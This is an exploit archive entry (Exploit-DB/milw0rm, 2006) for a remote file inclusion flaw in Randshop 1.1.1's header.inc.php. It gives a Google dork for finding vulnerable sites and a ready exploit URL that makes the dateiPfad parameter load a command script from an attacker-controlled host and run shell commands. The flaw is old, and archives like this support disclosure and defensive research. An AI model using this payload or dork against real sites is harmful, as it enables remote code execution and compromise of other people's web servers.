Randshop 1.1.1 - 'header.inc.php' Remote File Inclusion

EDB-ID:

1971


Author:

OLiBekaS

Type:

webapps


Platform:

PHP

Date:

2006-07-01


Title       : randshop <= 1.1.1 Remote File Inclusion Vulnerability
-
URL         : http://www.randshop.com/
-
Author      : OLiBekaS
-
contact     : olibekas[at]gmail.com
-
dork        : "software 2004-2005 by randshop"
-
exploit     : http://[target]/[path]/includes/header.inc.php?dateiPfad=http://[attacker]/cmd.txt?&cmd=ls
-
greatz      : Renzokuzen, skulmatic, sikunYuk, ulga, bigmaster, cgibin, weleh, and all #papmahackerlink crew
-

# milw0rm.com [2006-07-01]